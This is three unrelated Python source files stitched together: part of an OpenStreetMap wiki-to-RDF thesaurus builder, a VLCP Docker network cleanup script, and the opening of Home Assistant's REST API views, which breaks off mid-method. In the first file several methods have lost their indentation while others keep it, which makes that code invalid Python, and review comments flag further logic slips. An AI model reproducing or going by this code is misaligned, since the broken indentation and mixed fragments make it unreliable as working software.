                temp = temp.replace('[[wikipedia:en:', '')
                temp = temp.replace('[[wikipedia:','')
                temp = temp.replace('[[Wikipedia:','')
                temp = temp.replace('[[wiktionary:de:', '')
                temp = temp.replace('[[wiktionary:en:', '')
                temp = temp.replace('[[Wiktionary:','')
                temp = temp.replace('[[wiktionary:','')
                temp = temp.replace('[[','')
                temp = temp.replace(']]', '')
                scopeNoteDE = temp
        elif wikiData['lang'] == 'en':
            temp = wikiData['description']
            if temp is not None and not temp == '':
                temp = temp.replace('\'', '')
                scopeNoteEN = temp

        # The depiction is taken from whichever language entry was seen last.
        imageData = wikiData['image']
        depiction = imageData['image_url']
        # NOTE(review): this fallback re-reads the exact same fields and so can
        # never change the result -- looks like dead code or a copy/paste slip.
        if depiction is None or depiction == '':
            imageData = wikiData['image']
            depiction = imageData['image_url']

    # Fill the missing language via machine translation, marking it with the
    # configured translation hint.
    if scopeNoteDE == '' and not scopeNoteEN == '':
        if new:
            self.rdfGraph.addScopeNote(concept, scopeNoteEN, 'en')
            self.rdfGraph.addScopeNote(concept, self.translator.translateENtoDE(scopeNoteEN) + ' ' + self.translationHintDE, 'de')
        else:
            # NOTE(review): in the not-new branches EN uses set* but DE still
            # uses add* -- confirm the asymmetry is intended.
            self.rdfGraph.setScopeNote(concept, scopeNoteEN, 'en')
            self.rdfGraph.addScopeNote(concept, self.translator.translateENtoDE(scopeNoteEN) + ' ' + self.translationHintDE, 'de')
    elif not scopeNoteDE == '' and scopeNoteEN == '':
        if new:
            self.rdfGraph.addScopeNote(concept, self.translator.translateDEtoEN(scopeNoteDE) + ' ' + self.translationHintEN, 'en')
            self.rdfGraph.addScopeNote(concept, scopeNoteDE, 'de')
        else:
            self.rdfGraph.setScopeNote(concept, self.translator.translateDEtoEN(scopeNoteDE) + ' ' + self.translationHintEN, 'en')
            self.rdfGraph.addScopeNote(concept, scopeNoteDE, 'de')
    elif not scopeNoteDE == '' and not scopeNoteEN == '':
        if new:
            self.rdfGraph.addScopeNote(concept, scopeNoteEN, 'en')
            self.rdfGraph.addScopeNote(concept, scopeNoteDE, 'de')
        else:
            self.rdfGraph.setScopeNote(concept, scopeNoteEN, 'en')
            self.rdfGraph.addScopeNote(concept, scopeNoteDE, 'de')

    if depiction is not None and not depiction == '' and new:
        self.rdfGraph.addDepiction(concept, depiction)
    if depiction is not None and not depiction == '' and not new:
        self.rdfGraph.setDepiction(concept, depiction)
def updateTagStats(self, concept, key, value=None, wikiPageJson=None, new=True):
'''Updates stats counts, node use, way use, area use and relation use.'''
tagInfoStats = self.tagInfo.getTagInfoStats(key=key, value=value, wikiPageJson=wikiPageJson)
nodeStr = '{ "count": "0", "use": "False" }' # dummy values
wayStr = '{ "count": "0", "use": "False" }'
areaStr = '{ "count": "0", "use": "False" }'
relationStr = '{ "count": "0", "use": "False" }'
if value is None:
nodeStr = '{ "count": "' + str(tagInfoStats.getCountNodes()) + '", "use": "False" }'
wayStr = '{ "count": "' + str(tagInfoStats.getCountWays()) + '", "use": "False" }'
areaStr = '{ "count": "0", "use": "False" }'
relationStr = '{ "count": "' + str(tagInfoStats.getCountRelations()) + '", "use": "False" }'
else:
onNode = tagInfoStats.getOnNode()
onWay = tagInfoStats.getOnWay()
onRelation = tagInfoStats.getOnRelation()
#if not onNode and not onWay and not onRelation:
# onArea = True
#else:
# onArea = tagInfoStats.getOnArea()
onArea = tagInfoStats.getOnArea()
nodeStr = '{ "count": "' + str(tagInfoStats.getCountNodes()) + '", "use": "' + str(onNode) + '" }'
wayStr = '{ "count": "' + str(tagInfoStats.getCountWays()) + '", "use": "' + str(onWay) + '" }'
areaStr = '{ "count": "0"' + ', "use": "' + str(onArea) + '" }'
relationStr = '{ "count": "' + str(tagInfoStats.getCountRelations()) + '", "use": "' + str(onRelation) + '" }'
if new:
self.rdfGraph.addOSMNode(concept, nodeStr)
self.rdfGraph.addOSMWay(concept, wayStr)
self.rdfGraph.addOSMArea(concept, areaStr)
self.rdfGraph.addOSMRelation(concept, relationStr)
else:
self.rdfGraph.setOSMNode(concept, nodeStr)
self.rdfGraph.setOSMWay(concept, wayStr)
self.rdfGraph.setOSMArea(concept, areaStr)
self.rdfGraph.setOSMRelation(concept, relationStr)
    def deleteAllLinks(self, concept):
        '''Deletes all links for 'concept', both UriRefs and Literals.'''
        # Presumably the set* calls collapse every existing triple of each
        # predicate down to a single 'dummy' entry, and the remove* calls then
        # delete that entry, leaving the concept with no implies/combines/links
        # triples at all -- TODO confirm against the rdfGraph API.
        # NOTE(review): these names use "UriRef" while impliesToConcept() calls
        # addOSMImpliesURIRef -- confirm both spellings exist on rdfGraph.
        self.rdfGraph.setOSMImpliesUriRef(concept, 'dummy')
        self.rdfGraph.setOSMCombinesUriRef(concept, 'dummy')
        self.rdfGraph.setOSMLinksUriRef(concept, 'dummy')
        self.rdfGraph.setOSMImpliesLiteral(concept, 'dummy')
        self.rdfGraph.setOSMCombinesLiteral(concept, 'dummy')
        self.rdfGraph.setOSMLinksLiteral(concept, 'dummy')
        self.rdfGraph.removeOSMImpliesUriRef(concept, 'dummy')
        self.rdfGraph.removeOSMCombinesUriRef(concept, 'dummy')
        self.rdfGraph.removeOSMLinksUriRef(concept, 'dummy')
        self.rdfGraph.removeOSMImpliesLiteral(concept, 'dummy')
        self.rdfGraph.removeOSMCombinesLiteral(concept, 'dummy')
        self.rdfGraph.removeOSMLinksLiteral(concept, 'dummy')
def updateTagLinks(self, concept, key, value=None, wikiPageJson=None, new=True):
'''Updates the tag links from OSM wiki: implies, combinations and linked. Just as Literals.'''
tagInfoUpdate = self.tagInfo.getTagInfoStats(key=key, value=value, wikiPageJson=wikiPageJson)
listImplies = tagInfoUpdate.getListImplies()
listCombinations = tagInfoUpdate.getListCombinations()
listLinked = tagInfoUpdate.getListLinked()
if not new:
self.deleteAllLinks(concept)
impliesStr = '\t\tImplies: '
for tagImplies in listImplies: #tags or keys
self.rdfGraph.addOSMImpliesLiteral(concept, tagImplies)
impliesStr = impliesStr + tagImplies + ', '
combinesStr = '\t\tCombines: '
for tagCombines in listCombinations: #tags or keys
self.rdfGraph.addOSMCombinesLiteral(concept, tagCombines)
combinesStr = combinesStr + tagCombines + ', '
linksStr = '\t\tLinks: '
for tagLinks in listLinked: #tags or keys
self.rdfGraph.addOSMLinksLiteral(concept, tagLinks)
linksStr = linksStr + tagLinks + ', '
    def createKey(self, key, keyScheme):
        '''Adds key with name 'key' to the rdfGraph, with as much wiki information as possible.

        Returns the newly created key concept.'''
        keyConcept = self.rdfGraph.addConcept(self.osmWikiBase + 'Key:' + key)
        self.rdfGraph.addInScheme(keyConcept, keyScheme)
        self.rdfGraph.addPrefLabel(keyConcept, key)
        # rdfGraph.addHasTopConcept(keyScheme, keyConcept)
        keyWikiPageJson = self.tagInfo.getWikiPageOfKey(key)
        # Stats, links and depiction/scope notes are only available for keys
        # that actually have an OSM wiki page.
        if len(keyWikiPageJson) > 0:
            self.updateTagStats(concept=keyConcept, key=key, wikiPageJson=keyWikiPageJson)
            self.updateTagLinks(concept=keyConcept, key=key, wikiPageJson=keyWikiPageJson)
            self.addDepictionScopeNote(keyConcept, keyWikiPageJson)
        self.rdfGraph.addEditorialNote(keyConcept, self.editNote)
        return keyConcept
    def createTag(self, key, keyConcept, value, tagScheme):
        '''Adds value with name 'key'='value' to the rdfGraph, with as much wiki information as possible.

        Returns the new tag concept, or None (implicitly) when the tag has no
        OSM wiki page.'''
        taglink = self.osmWikiBase + 'Tag:' + key + '=' + value # before: key + '%3D' + value
        # result = requests.get('http://' + taglink)
        tagWikiPageJson = self.tagInfo.getWikiPageOfTag(key, value)
        # Tags without a wiki page are skipped entirely.
        if len(tagWikiPageJson) > 0:
            tagConcept = self.rdfGraph.addConcept(taglink)
            self.rdfGraph.addInScheme(tagConcept, tagScheme)
            self.rdfGraph.addPrefLabel(tagConcept, key + '=' + value)
            # Link the tag below its key in the SKOS hierarchy (both directions).
            self.rdfGraph.addBroader(tagConcept, keyConcept)
            self.rdfGraph.addNarrower(keyConcept, tagConcept)
            self.updateTagStats(concept=tagConcept, key=key, value=value, wikiPageJson=tagWikiPageJson)
            self.updateTagLinks(concept=tagConcept, key=key, value=value, wikiPageJson=tagWikiPageJson)
            self.addDepictionScopeNote(tagConcept, tagWikiPageJson)
            self.rdfGraph.addEditorialNote(tagConcept, self.editNote)
            return tagConcept
    def createGraph(self, keyList, tagMap):
        '''Fills rdfGraph with keys and tags.

        :param keyList: iterable of OSM keys to create
        :param tagMap: mapping key -> list of values for that key
        '''
        keyScheme = self.rdfGraph.addConceptScheme(self.keySchemeName, self.keySchemeTitle, self.creator)
        tagScheme = self.rdfGraph.addConceptScheme(self.tagSchemeName, self.tagSchemeTitle, self.creator)
        # Progress reporting: one "part" per key plus one per tag.
        totalParts = self.numberKeys + self.numberTags
        atPart = 1
        # Keys from the exact-match filter are always created, even when they
        # are not part of keyList.
        for filteredKey in self.filterUtil.exactKeyFilter:
            # NOTE(review): this calls self.console.printPercent while the
            # loops below call self.printPercent -- confirm which is correct.
            self.console.printPercent(partInt=atPart, totalInt=totalParts, workingOn='Key: ' + filteredKey)
            keyConcept = self.createKey(filteredKey, keyScheme)
            atPart = atPart + 1
        for key in keyList:
            self.printPercent(partInt=atPart, totalInt=totalParts, workingOn='Key: ' + key)
            keyConcept = self.createKey(key, keyScheme)
            atPart = atPart + 1
            valueList = tagMap.get(key)
            # Keys without recorded values get no tag concepts.
            if valueList is None or len(valueList) == 0:
                continue
            for value in valueList:
                self.printPercent(partInt=atPart, totalInt=totalParts, workingOn='Tag: ' + key + '=' + value)
                self.createTag(key, keyConcept, value, tagScheme)
                atPart = atPart + 1
def impliesToConcept(self):
for subject, obj in self.rdfGraph.getSubObjOSMImplies():
foundConcept = self.rdfGraph.getSubByPrefLabel(str(obj))
if foundConcept is not None:
self.rdfGraph.removeOSMImpliesLiteral(str(subject), str(obj))
self.rdfGraph.addOSMImpliesURIRef(str(subject), foundConcept)
def combinesToConcept(self):
for subject, obj in self.rdfGraph.getSubObjOSMCombines():
foundConcept = self.rdfGraph.getSubByPrefLabel(str(obj))
if foundConcept is not None:
self.rdfGraph.removeOSMCombinesLiteral(str(subject), str(obj))
self.rdfGraph.addOSMCombinesURIRef(str(subject), foundConcept)
def linksToConcept(self):
for subject, obj in self.rdfGraph.getSubObjOSMLinks():
foundConcept = self.rdfGraph.getSubByPrefLabel(str(obj))
if foundConcept is not None:
self.rdfGraph.removeOSMLinksLiteral(str(subject), str(obj))
self.rdfGraph.addOSMLinksURIRef(str(subject), foundConcept)
def osmLinksToConcept(self):
'''Traverse the rdfGraph and replaces OSM Wiki links literals (implies, combines, links)
to concepts of this rdfGraph, should they exists. Should be done once the rdfGraph
is created completly.'''
self.impliesToConcept()
self.combinesToConcept()
self.linksToConcept()
| |
'''
Created on 2016/11/3
:author: hubo
'''
from __future__ import print_function
from vlcp.config import manager
from vlcp.scripts.script import ScriptModule
import vlcp.service.sdn.viperflow as viperflow
import vlcp.service.kvdb.objectdb as objectdb
from vlcp.server.module import depend, call_api
from vlcp.utils.connector import TaskPool
from vlcp.protocol.http import Http, HttpConnectionStateEvent
import subprocess
from time import sleep
import sys
from vlcp_docker.dockerplugin import _unplug_ovs, _delete_veth
import os
import os.path
from vlcp.event.connection import Client
from vlcp.event.stream import MemoryStream
import json
import vlcp.utils.encoders as encoders
from vlcp.event.event import M_
try:
from shlex import quote as shell_quote
except:
from pipes import quote as shell_quote
import itertools
# Shell snippet: list OVS interfaces in an error state whose name contains the
# veth prefix. %s placeholders: (ovs command, veth prefix), both shell-quoted
# by the caller.
_find_invalid_ovs = '''#/bin/bash
%s find interface error!=[] | grep name | grep %s | grep -oP '".*"' | awk '{print substr($1, 2, length($1) - 2)}'
'''
# Shell snippet: list leftover "<prefix>...-tap" veth devices from ip-link.
# Raw string: the grep patterns contain "\-", which is an invalid Python
# escape sequence (DeprecationWarning); the raw literal keeps the exact same
# runtime value without the warning.
_find_unused_veth = r'''#/bin/bash
%s link show | grep '\-tap@'%s | awk '{print $2}' | grep -oP '.*\-tap'
'''
def _bytes(s, encoding = 'ascii'):
    """Return *s* encoded to bytes; byte strings pass through unchanged."""
    if not isinstance(s, str):
        return s
    return s.encode(encoding)
def _str(s, encoding = 'utf-8'):
    """Return *s* decoded to text; text strings pass through unchanged."""
    if isinstance(s, str):
        return s
    return s.decode(encoding)
@depend(viperflow.ViperFlow, objectdb.ObjectDB)
class Cleanup(ScriptModule):
    '''
    Clean up unreleased veth devices, delete unreleased logical ports. Comparing current logical ports
    with docker API result
    cleanup.py -f <configfile> [-H <endpoint>] [--skipovs] [--skipiplink] [--skiplogicalport] [--nodockerinfo]
    -H or --host: specify docker API endpoint
    --skipovs: do not remove invalid ports from OpenvSwitch
    --skipiplink: do not remove extra veth devices
    --skiplogicalport: do not remove unreleased logical ports
    --nodockerinfo: do not detect docker info, always delete logical ports
    '''
    # NOTE(review): --nodockerinfo is documented above but has no entry in
    # 'options' and no parameter in run() -- confirm whether it was dropped.
    # Each entry: (option name, short form, takes-argument).
    options = (('skipovs', None, False),
               ('skipiplink', None, False),
               ('skiplogicalport', None, False),
               ('host', 'H', True)
               )
    async def run(self, host = None, skipovs = None, skipiplink = None, skiplogicalport = None):
        # Command-line flags arrive as None/non-None; normalize to booleans.
        skipovs = (skipovs is not None)
        skipiplink = (skipiplink is not None)
        skiplogicalport = (skiplogicalport is not None)
        # Thread pool for running blocking work (subprocess calls) off the loop.
        pool = TaskPool(self.scheduler)
        pool.start()
        if host is None:
            host = os.environ.get('DOCKER_HOST', 'unix:///var/run/docker.sock')
        enable_ssl = os.environ.get('DOCKER_TLS_VERIFY', '')
        cert_root_path = os.environ.get('DOCKER_CERT_PATH', '~/.docker')
        ca_path, cert_path, key_path = [os.path.join(cert_root_path, f) for f in ('ca.pem', 'cert.pem', 'key.pem')]
        if '/' not in host:
            # Bare "host[:port]" value: prepend a scheme based on TLS setting.
            if enable_ssl:
                host = 'ssl://' + host
            else:
                host = 'tcp://' + host
        self._docker_conn = None
        http_protocol = Http(False)
        http_protocol.defaultport = 2375
        # NOTE(review): Docker's conventional TLS port is 2376; the SSL default
        # here is also 2375 -- confirm this is intended.
        http_protocol.ssldefaultport = 2375
        http_protocol.persist = False
        def _create_docker_conn():
            # (Re)create the HTTP client connection to the docker API endpoint.
            self._docker_conn = Client(host, http_protocol, self.scheduler, key_path, cert_path, ca_path)
            self._docker_conn.start()
            return self._docker_conn
        async def call_docker_api(path, data = None, method = None):
            # Issue one request against the docker API; reconnects on demand
            # and returns the JSON-decoded response body (or {} for no body).
            if self._docker_conn is None or not self._docker_conn.connected:
                _create_docker_conn()
                conn_up = HttpConnectionStateEvent.createMatcher(HttpConnectionStateEvent.CLIENT_CONNECTED)
                conn_noconn = HttpConnectionStateEvent.createMatcher(HttpConnectionStateEvent.CLIENT_NOTCONNECTED)
                _, m = await M_(conn_up, conn_noconn)
                if m is conn_noconn:
                    raise IOError('Cannot connect to docker API endpoint: ' + repr(host))
            if method is None:
                # Default verb: GET without a body, POST with one.
                if data is None:
                    method = b'GET'
                else:
                    method = b'POST'
            if data is None:
                final_resp, _ = await http_protocol.request_with_response(
                    self.apiroutine,
                    self._docker_conn,
                    b'docker',
                    _bytes(path),
                    method,
                    [(b'Accept-Encoding', b'gzip, deflate')]
                )
            else:
                final_resp, _ = await http_protocol.request_with_response(
                    self.apiroutine,
                    self._docker_conn,
                    b'docker',
                    _bytes(path),
                    method,
                    [(b'Content-Type', b'application/json;charset=utf-8'),
                     (b'Accept-Encoding', b'gzip, deflate')],
                    MemoryStream(_bytes(json.dumps(data))))
            output_stream = final_resp.stream
            try:
                if final_resp.statuscode >= 200 and final_resp.statuscode < 300:
                    # Transparently decompress when the server compressed the body.
                    if output_stream is not None and b'content-encoding' in final_resp.headerdict:
                        ce = final_resp.headerdict.get(b'content-encoding')
                        if ce.lower() == b'gzip' or ce.lower() == b'x-gzip':
                            output_stream.getEncoderList().append(encoders.gzip_decoder())
                        elif ce.lower() == b'deflate':
                            output_stream.getEncoderList().append(encoders.deflate_decoder())
                    if output_stream is None:
                        return {}
                    else:
                        data = await output_stream.read(self.apiroutine)
                        return json.loads(data.decode('utf-8'))
                else:
                    raise ValueError('Docker API returns error status: ' + repr(final_resp.status))
            finally:
                if output_stream is not None:
                    output_stream.close(self.scheduler)
        async def execute_bash(script, ignoreerror = True):
            # Run a shell script in a worker thread; returns its stdout as text.
            def task():
                try:
                    # NOTE(review): if Popen itself raises, 'sp' is unbound in
                    # the finally block below -- confirm this is acceptable.
                    sp = subprocess.Popen(['bash'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                    outdata, errdata = sp.communicate(_bytes(script))
                    sys.stderr.write(_str(errdata))
                    errno = sp.poll()
                    if errno != 0 and not ignoreerror:
                        print('Script failed, output:\n', repr(outdata), file=sys.stderr)
                        raise ValueError('Script returns %d' % (errno,))
                    else:
                        return _str(outdata)
                finally:
                    # Best-effort: make sure the child process is gone.
                    if sp.poll() is None:
                        try:
                            sp.terminate()
                            sleep(2)
                            if sp.poll() is None:
                                sp.kill()
                        except Exception:
                            pass
            return await pool.run_task(self.apiroutine, task)
        # Configuration from the docker plugin module settings, with defaults.
        ovsbridge = manager.get('module.dockerplugin.ovsbridge', 'dockerbr0')
        vethprefix = manager.get('module.dockerplugin.vethprefix', 'vlcp')
        ipcommand = manager.get('module.dockerplugin.ipcommand', 'ip')
        ovscommand = manager.get('module.dockerplugin.ovscommand', 'ovs-vsctl')
        find_invalid_ovs = _find_invalid_ovs % (shell_quote(ovscommand), shell_quote(vethprefix))
        find_unused_veth = _find_unused_veth % (shell_quote(ipcommand), shell_quote(vethprefix))
        print("docker API endpoint: ", host)
        print("ovsbridge: ", ovsbridge)
        print("vethprefix: ", vethprefix)
        async def invalid_ovs_ports():
            # Detect error-state OVS interfaces twice, 5 seconds apart; only
            # ports present in both samples are considered invalid and removed.
            result = await execute_bash(find_invalid_ovs)
            first_invalid_ovs_list = result.splitlines(False)
            first_invalid_ovs_list = [k.strip() for k in first_invalid_ovs_list if k.strip()]
            if first_invalid_ovs_list:
                print("Detect %d invalid ports from OpenvSwitch, wait 5 seconds to detect again..." % (len(first_invalid_ovs_list),))
            else:
                return []
            await self.apiroutine.wait_with_timeout(5)
            result = await execute_bash(find_invalid_ovs)
            second_invalid_ovs_list = result.splitlines(False)
            second_invalid_ovs_list = [k.strip() for k in second_invalid_ovs_list if k.strip()]
            invalid_ports = list(set(first_invalid_ovs_list).intersection(second_invalid_ovs_list))
            if invalid_ports:
                print('Detect %d invalid ports from intersection of two tries, removing...' % (len(invalid_ports),))
                # Remove these ports
                def _remove_ports():
                    for p in invalid_ports:
                        try:
                            _unplug_ovs(ovscommand, ovsbridge, p[:-len('-tag')])
                        except Exception as exc:
                            print('Remove port %r failed: %s' % (p, exc))
                await pool.run_task(self.apiroutine, _remove_ports)
            return invalid_ports
        async def remove_unused_ports():
            # Same double-sampling strategy for leftover veth devices (ip-link).
            result = await execute_bash(find_unused_veth)
            first_unused_ports = result.splitlines(False)
            first_unused_ports = [k.strip() for k in first_unused_ports if k.strip()]
            if first_unused_ports:
                print("Detect %d unused ports from ip-link, wait 5 seconds to detect again..." % (len(first_unused_ports),))
            else:
                return []
            await self.apiroutine.wait_with_timeout(5)
            result = await execute_bash(find_unused_veth)
            second_unused_ports = result.splitlines(False)
            second_unused_ports = [k.strip() for k in second_unused_ports if k.strip()]
            unused_ports = list(set(first_unused_ports).intersection(second_unused_ports))
            if unused_ports:
                print('Detect %d unused ports from intersection of two tries, removing...' % (len(unused_ports),))
                # Remove these ports
                def _remove_ports():
                    for p in unused_ports:
                        try:
                            _unplug_ovs(ovscommand, ovsbridge, p[:-len('-tag')])
                        except Exception as exc:
                            print('Remove port %r from OpenvSwitch failed: %s' % (p, exc))
                        try:
                            _delete_veth(ipcommand, p[:-len('-tag')])
                        except Exception as exc:
                            print('Delete port %r with ip-link failed: %s' % (p, exc))
                await pool.run_task(self.apiroutine, _remove_ports)
            return unused_ports
        async def detect_unused_logports():
            # docker network ls
            print("Check logical ports from docker API...")
            result = await call_docker_api(br'/v1.24/networks?filters={"driver":["vlcp"]}')
            # network id -> {endpoint id: IPv4 address}
            network_ports = dict((n['Id'], dict((p['EndpointID'], p['IPv4Address'])
                                                for p in n['Containers'].values()))
                                 for n in result
                                 if n['Driver'] == 'vlcp') # Old version of docker API does not support filter by driver
            print("Find %d networks and %d endpoints from docker API, recheck in 5 seconds..." % \
                  (len(network_ports), sum(len(ports) for ports in network_ports.values())))
            async def recheck_ports():
                # Second docker query used to cross-check the first snapshot.
                await self.apiroutine.wait_with_timeout(5)
                # docker network inspect, use this for cross check
                result = await call_docker_api(br'/v1.24/networks?filters={"driver":["vlcp"]}')
                second_network_ports = dict((n['Id'], dict((p['EndpointID'], p['IPv4Address'])
                                                           for p in n['Containers'].values()))
                                            for n in result
                                            if n['Id'] in network_ports and n['Driver'] == 'vlcp')
                for nid in network_ports:
                    if nid not in second_network_ports:
                        print('WARNING: network {} may be removed.'.format(nid))
                        second_network_ports[nid] = {}
                print("Recheck find %d endpoints from docker API" % \
                      (sum(len(ports) for ports in second_network_ports.values()),))
                return second_network_ports
            async def check_viperflow():
                # Query logical ports from the ViperFlow database twice and
                # keep the intersection of the two samples.
                first_vp_ports = {}
                for nid in network_ports:
                    result = await call_api(self.apiroutine, 'viperflow', 'listlogicalports',
                                            {'logicalnetwork': 'docker-' + nid + '-lognet'})
                    first_vp_ports[nid] = dict((p['id'], p.get('ip_address'))
                                               for p in result
                                               if p['id'].startswith('docker-'))
                print("Find %d endpoints from viperflow database, recheck in 5 seconds..." % \
                      (sum(len(ports) for ports in first_vp_ports.values()),))
                await self.apiroutine.wait_with_timeout(5)
                second_vp_ports = {}
                for nid in network_ports:
                    result = await call_api(self.apiroutine, 'viperflow', 'listlogicalports',
                                            {'logicalnetwork': 'docker-' + nid + '-lognet'})
                    second_vp_ports[nid] = dict((p['id'], p.get('ip_address'))
                                                for p in result
                                                if p['id'] in first_vp_ports[nid])
                print("Find %d endpoints from viperflow database from the intersection of two tries" % \
                      (sum(len(ports) for ports in second_vp_ports.values()),))
                # Strip the 'docker-' prefix to recover docker endpoint IDs.
                second_vp_ports = dict((nid, dict((pid[len('docker-'):], addr)
                                                  for pid, addr in v.items()))
                                       for nid, v in second_vp_ports.items())
                return second_vp_ports
            second_vp_ports = await check_viperflow()
            second_ports = await recheck_ports()
            # A logical port is unused when docker does not know its endpoint
            # in either snapshot.
            unused_logports = dict((nid, dict((pid, addr)
                                              for pid, addr in v.items()
                                              if pid not in network_ports[nid] and\
                                                 pid not in second_ports[nid]))
                                   for nid, v in second_vp_ports.items())
            return unused_logports
        routines = []
        if not skipovs:
            routines.append(invalid_ovs_ports())
        if not skipiplink:
            routines.append(remove_unused_ports())
        if not skiplogicalport:
            routines.append(detect_unused_logports())
        execute_result = await self.apiroutine.execute_all(routines)
        if skiplogicalport:
            return
        # detect_unused_logports() is always the last routine when not skipped.
        unused_logports = execute_result[-1]
        if any(ports for ports in unused_logports.values()):
            print("Find %d unused logical ports, first 20 ips:\n%r" % \
                  (sum(len(ports) for ports in unused_logports.values()),
                   [v for _,v in \
                    itertools.takewhile(lambda x: x[0] <= 20,
                                        enumerate(addr for ports in unused_logports.values()
                                                  for addr in ports.values()))]))
            print("Will remove them in 5 seconds, press Ctrl+C to cancel...")
            await self.apiroutine.wait_with_timeout(5)
            for ports in unused_logports.values():
                for p, addr in ports.items():
                    try:
                        await call_api(self.apiroutine, 'viperflow', 'deletelogicalport',
                                       {'id': 'docker-' + p})
                    except Exception as exc:
                        print("WARNING: remove logical port %r (IP: %s) failed, maybe it is already removed. Message: %s" % \
                              (p, addr, exc))
        print("Done.")
# Script entry point: ScriptModule provides the main() driver.
if __name__ == '__main__':
    Cleanup.main()
| |
"""Rest API for Home Assistant."""
import asyncio
from http import HTTPStatus
import json
import logging
from aiohttp import web
from aiohttp.web_exceptions import HTTPBadRequest
import async_timeout
import voluptuous as vol
from homeassistant.auth.permissions.const import POLICY_READ
from homeassistant.bootstrap import DATA_LOGGING
from homeassistant.components.http import HomeAssistantView
from homeassistant.const import (
EVENT_HOMEASSISTANT_STOP,
EVENT_TIME_CHANGED,
MATCH_ALL,
URL_API,
URL_API_COMPONENTS,
URL_API_CONFIG,
URL_API_DISCOVERY_INFO,
URL_API_ERROR_LOG,
URL_API_EVENTS,
URL_API_SERVICES,
URL_API_STATES,
URL_API_STREAM,
URL_API_TEMPLATE,
)
import homeassistant.core as ha
from homeassistant.exceptions import ServiceNotFound, TemplateError, Unauthorized
from homeassistant.helpers import template
from homeassistant.helpers.json import JSONEncoder
from homeassistant.helpers.service import async_get_all_descriptions
# Module-level logger for the API component.
_LOGGER = logging.getLogger(__name__)
# Keys of the (deprecated) discovery-info response payload.
ATTR_BASE_URL = "base_url"
ATTR_EXTERNAL_URL = "external_url"
ATTR_INTERNAL_URL = "internal_url"
ATTR_LOCATION_NAME = "location_name"
ATTR_INSTALLATION_TYPE = "installation_type"
ATTR_REQUIRES_API_PASSWORD = "requires_api_password"
ATTR_UUID = "uuid"
ATTR_VERSION = "version"
DOMAIN = "api"
# Event-stream keep-alive: payload sent whenever no event arrived within the interval.
STREAM_PING_PAYLOAD = "ping"
STREAM_PING_INTERVAL = 50  # seconds
async def async_setup(hass, config):
    """Register the API with the HTTP interface."""
    views = [
        APIStatusView,
        APIEventStream,
        APIConfigView,
        APIDiscoveryView,
        APIStatesView,
        APIEntityStateView,
        APIEventListenersView,
        APIEventView,
        APIServicesView,
        APIDomainServicesView,
        APIComponentsView,
        APITemplateView,
    ]
    # The error-log view is only useful when file logging is configured.
    if DATA_LOGGING in hass.data:
        views.append(APIErrorLog)
    for view in views:
        hass.http.register_view(view)
    return True
class APIStatusView(HomeAssistantView):
    """Expose a simple liveness check at the API root."""

    url = URL_API
    name = "api:status"

    @ha.callback
    def get(self, request):
        """Report that the API is up."""
        return self.json_message("API running.")
class APIEventStream(HomeAssistantView):
    """View to handle EventStream requests."""

    url = URL_API_STREAM
    name = "api:stream"

    async def get(self, request):
        """Provide a streaming interface for the event bus.

        Streams bus events to the client as server-sent events (admin only).
        An optional "restrict" query parameter (comma-separated event types)
        limits which events are forwarded.
        """
        # pylint: disable=no-self-use
        if not request["hass_user"].is_admin:
            raise Unauthorized()
        hass = request.app["hass"]
        # Sentinel queued to signal that the stream should terminate.
        stop_obj = object()
        to_write = asyncio.Queue()
        if restrict := request.query.get("restrict"):
            # Always include the stop event so shutdown still ends the stream.
            restrict = restrict.split(",") + [EVENT_HOMEASSISTANT_STOP]

        async def forward_events(event):
            """Forward events to the open request."""
            # Time-change events are far too chatty to stream.
            if event.event_type == EVENT_TIME_CHANGED:
                return
            if restrict and event.event_type not in restrict:
                return
            _LOGGER.debug("STREAM %s FORWARDING %s", id(stop_obj), event)
            if event.event_type == EVENT_HOMEASSISTANT_STOP:
                data = stop_obj
            else:
                data = json.dumps(event, cls=JSONEncoder)
            await to_write.put(data)

        response = web.StreamResponse()
        response.content_type = "text/event-stream"
        await response.prepare(request)
        unsub_stream = hass.bus.async_listen(MATCH_ALL, forward_events)
        try:
            _LOGGER.debug("STREAM %s ATTACHED", id(stop_obj))
            # Fire off one message so browsers fire open event right away
            await to_write.put(STREAM_PING_PAYLOAD)
            while True:
                try:
                    # Wake up periodically to send a keep-alive ping when no
                    # event arrived within the interval.
                    async with async_timeout.timeout(STREAM_PING_INTERVAL):
                        payload = await to_write.get()
                    if payload is stop_obj:
                        break
                    msg = f"data: {payload}\n\n"
                    _LOGGER.debug("STREAM %s WRITING %s", id(stop_obj), msg.strip())
                    await response.write(msg.encode("UTF-8"))
                except asyncio.TimeoutError:
                    await to_write.put(STREAM_PING_PAYLOAD)
        except asyncio.CancelledError:
            # Client disconnected.
            _LOGGER.debug("STREAM %s ABORT", id(stop_obj))
        finally:
            _LOGGER.debug("STREAM %s RESPONSE CLOSED", id(stop_obj))
            # Detach from the bus when the stream ends for any reason.
            unsub_stream()
        return response
class APIConfigView(HomeAssistantView):
    """Expose the current core configuration."""

    url = URL_API_CONFIG
    name = "api:config"

    @ha.callback
    def get(self, request):
        """Return the configuration as a JSON dictionary."""
        hass = request.app["hass"]
        return self.json(hass.config.as_dict())
class APIDiscoveryView(HomeAssistantView):
    """
    Serve (blanked-out) discovery information.

    DEPRECATED: To be removed in 2022.1
    """

    requires_auth = False
    url = URL_API_DISCOVERY_INFO
    name = "api:discovery"

    async def get(self, request):
        """Return an empty discovery payload."""
        payload = {
            ATTR_UUID: "",
            ATTR_BASE_URL: "",
            ATTR_EXTERNAL_URL: "",
            ATTR_INTERNAL_URL: "",
            ATTR_LOCATION_NAME: "",
            ATTR_INSTALLATION_TYPE: "",
            ATTR_REQUIRES_API_PASSWORD: True,
            ATTR_VERSION: "",
        }
        return self.json(payload)
class APIStatesView(HomeAssistantView):
    """Expose all entity states the requesting user may read."""

    url = URL_API_STATES
    name = "api:states"

    @ha.callback
    def get(self, request):
        """Return every state the user has read permission for."""
        hass = request.app["hass"]
        entity_perm = request["hass_user"].permissions.check_entity
        readable = list(
            filter(
                lambda state: entity_perm(state.entity_id, "read"),
                hass.states.async_all(),
            )
        )
        return self.json(readable)
class APIEntityStateView(HomeAssistantView):
    """View to handle EntityState requests."""

    url = "/api/states/{entity_id}"
    name = "api:entity-state"

    @ha.callback
    def get(self, request, entity_id):
        """Retrieve state of entity.

        Requires read permission on the entity; 404 when it does not exist.
        """
        user = request["hass_user"]
        if not user.permissions.check_entity(entity_id, POLICY_READ):
            raise Unauthorized(entity_id=entity_id)
